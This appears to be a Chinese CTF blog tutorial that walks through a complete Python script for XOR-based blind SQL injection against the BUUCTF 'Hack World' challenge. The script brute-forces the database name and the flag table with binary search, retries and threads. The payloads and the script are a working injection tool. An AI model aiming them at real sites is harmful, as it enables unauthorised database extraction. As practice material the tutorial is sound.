手把手教你用Python脚本自动化破解BUUCTF Hack World的异或盲注
·
Python自动化破解BUUCTF Hack World异或盲注实战指南
在CTF竞赛中,Web安全题目常常涉及SQL注入漏洞的利用。传统的折半查找法虽然有效,但手工操作效率低下且容易出错。本文将带你用Python编写一个自动化脚本,专门针对BUUCTF平台上的Hack World题目中的异或盲注漏洞进行高效爆破。
1. 理解异或盲注原理与题目特征
异或盲注(XOR Blind Injection)是一种特殊的SQL注入技术,它利用数据库中的异或运算特性来推断信息。在Hack World题目中,我们发现当提交 id=0^1 时会返回"Hello, glzjin wants a girlfriend.",而 id=0^0 则返回空或错误信息。
异或运算的基本规则:
- 0 ^ 0 = 0
- 0 ^ 1 = 1
- 1 ^ 0 = 1
- 1 ^ 1 = 0
我们可以利用这个特性构造布尔条件,通过服务器响应差异来判断条件真假。例如:
# 判断数据库名长度是否大于10
payload = "0^(length(database())>10)"
如果返回特定响应,说明条件为真(1),否则为假(0)。
2. 构建自动化爆破脚本框架
我们需要创建一个Python脚本,使用requests库发送HTTP请求,并自动处理响应判断。以下是基础框架:
import requests
TARGET_URL = "http://example.com" # 替换为实际题目URL
SUCCESS_RESPONSE = "Hello, glzjin wants a girlfriend."
def send_payload(payload):
params = {'id': payload}
response = requests.get(TARGET_URL, params=params)
return SUCCESS_RESPONSE in response.text
def test_condition(condition):
payload = f"0^({condition})"
return send_payload(payload)
3. 实现高效字符爆破算法
手工折半查找效率低,我们可以实现自动化的二分查找算法来爆破每个字符:
def binary_search_char(subquery, index):
low = 32 # ASCII可打印字符起始
high = 126 # ASCII可打印字符结束
result = None
while low <= high:
mid = (low + high) // 2
condition = f"ascii(substr(({subquery}),{index},1))>{mid}"
if test_condition(condition):
low = mid + 1
else:
condition_eq = f"ascii(substr(({subquery}),{index},1))={mid}"
if test_condition(condition_eq):
result = chr(mid)
break
high = mid - 1
return result
4. 自动化获取数据库信息
利用上述函数,我们可以编写获取数据库信息的通用方法:
def get_string_data(subquery, max_length=50):
result = ""
# 先确定长度
length = binary_search_length(subquery, max_length)
# 逐字符爆破
for i in range(1, length + 1):
char = binary_search_char(subquery, i)
if char:
result += char
print(f"\rProgress: {i}/{length} - {result}", end="")
else:
break
print()
return result
def binary_search_length(subquery, max_length):
low = 1
high = max_length
result = 1
while low <= high:
mid = (low + high) // 2
condition = f"length(({subquery}))>{mid}"
if test_condition(condition):
low = mid + 1
else:
condition_eq = f"length(({subquery}))={mid}"
if test_condition(condition_eq):
result = mid
break
high = mid - 1
return result
5. 实战应用:获取flag
现在我们可以直接获取flag表中的内容:
def get_flag():
flag_query = "select(flag)from(flag)"
flag = get_string_data(flag_query)
print(f"\nFlag found: {flag}")
return flag
if __name__ == "__main__":
print("[*] Starting automated exploitation...")
# 获取数据库名
db_name = get_string_data("database()")
print(f"[+] Database name: {db_name}")
# 获取flag
flag = get_flag()
6. 脚本优化与错误处理
为了使脚本更健壮,我们需要添加一些优化:
import time
def send_payload(payload, max_retries=3, delay=1):
for attempt in range(max_retries):
try:
params = {'id': payload}
response = requests.get(TARGET_URL, params=params, timeout=10)
return SUCCESS_RESPONSE in response.text
except Exception as e:
print(f"[-] Attempt {attempt + 1} failed: {str(e)}")
if attempt < max_retries - 1:
time.sleep(delay)
else:
raise
def get_string_data(subquery, max_length=50):
result = ""
try:
length = binary_search_length(subquery, max_length)
print(f"[*] Length determined: {length}")
for i in range(1, length + 1):
char = binary_search_char(subquery, i)
if char:
result += char
print(f"\rProgress: {i}/{length} - {result}", end="", flush=True)
else:
print(f"\n[!] Failed to get character at position {i}")
break
except KeyboardInterrupt:
print("\n[!] Interrupted by user")
if result:
print(f"[*] Partial result: {result}")
except Exception as e:
print(f"\n[!] Error: {str(e)}")
print()
return result
7. 多线程加速爆破过程
对于较长的字符串,我们可以使用多线程加速爆破:
from concurrent.futures import ThreadPoolExecutor
def get_string_data_parallel(subquery, max_length=50, threads=4):
result = [None] * max_length
length = binary_search_length(subquery, max_length)
print(f"[*] Length determined: {length}")
def get_char(position):
return binary_search_char(subquery, position)
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {executor.submit(get_char, i): i for i in range(1, length + 1)}
for future in futures:
position = futures[future]
try:
char = future.result()
if char:
result[position - 1] = char
current = ''.join([c if c else '?' for c in result[:position]])
print(f"\rProgress: {position}/{length} - {current}", end="", flush=True)
except Exception as e:
print(f"\n[!] Error at position {position}: {str(e)}")
final_result = ''.join([c for c in result if c])
print(f"\n[+] Result: {final_result}")
return final_result
8. 完整脚本与使用说明
将以上各部分组合起来,我们得到完整的自动化爆破脚本:
import requests
import time
from concurrent.futures import ThreadPoolExecutor
# 配置部分
TARGET_URL = "http://example.com" # 替换为实际题目URL
SUCCESS_RESPONSE = "Hello, glzjin wants a girlfriend."
MAX_RETRIES = 3
REQUEST_DELAY = 0.5 # 防止请求过快被拦截
THREADS = 4 # 并发线程数
def send_payload(payload, max_retries=MAX_RETRIES, delay=REQUEST_DELAY):
for attempt in range(max_retries):
try:
params = {'id': payload}
response = requests.get(TARGET_URL, params=params, timeout=10)
return SUCCESS_RESPONSE in response.text
except Exception as e:
print(f"[-] Attempt {attempt + 1} failed: {str(e)}")
if attempt < max_retries - 1:
time.sleep(delay)
else:
raise
def test_condition(condition):
payload = f"0^({condition})"
return send_payload(payload)
def binary_search_char(subquery, index):
low = 32
high = 126
result = None
while low <= high:
mid = (low + high) // 2
condition = f"ascii(substr(({subquery}),{index},1))>{mid}"
if test_condition(condition):
low = mid + 1
else:
condition_eq = f"ascii(substr(({subquery}),{index},1))={mid}"
if test_condition(condition_eq):
result = chr(mid)
break
high = mid - 1
return result
def binary_search_length(subquery, max_length):
low = 1
high = max_length
result = 1
while low <= high:
mid = (low + high) // 2
condition = f"length(({subquery}))>{mid}"
if test_condition(condition):
low = mid + 1
else:
condition_eq = f"length(({subquery}))={mid}"
if test_condition(condition_eq):
result = mid
break
high = mid - 1
return result
def get_string_data_parallel(subquery, max_length=50, threads=THREADS):
result = [None] * max_length
length = binary_search_length(subquery, max_length)
print(f"[*] Length determined: {length}")
def get_char(position):
return binary_search_char(subquery, position)
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {executor.submit(get_char, i): i for i in range(1, length + 1)}
for future in futures:
position = futures[future]
try:
char = future.result()
if char:
result[position - 1] = char
current = ''.join([c if c else '?' for c in result[:position]])
print(f"\rProgress: {position}/{length} - {current}", end="", flush=True)
except Exception as e:
print(f"\n[!] Error at position {position}: {str(e)}")
final_result = ''.join([c for c in result if c])
print(f"\n[+] Result: {final_result}")
return final_result
def main():
print("[*] Starting automated exploitation...")
# 获取数据库名
print("\n[*] Retrieving database name...")
db_name = get_string_data_parallel("database()")
print(f"[+] Database name: {db_name}")
# 获取flag
print("\n[*] Retrieving flag...")
flag = get_string_data_parallel("select(flag)from(flag)")
print(f"[+] Flag: {flag}")
if __name__ == "__main__":
main()
使用说明:
- 将
TARGET_URL替换为实际题目URL - 根据题目响应调整
SUCCESS_RESPONSE - 可以调整
THREADS参数控制并发数 - 如果遇到请求失败,可以调整
MAX_RETRIES和REQUEST_DELAY
更多推荐
所有评论(0)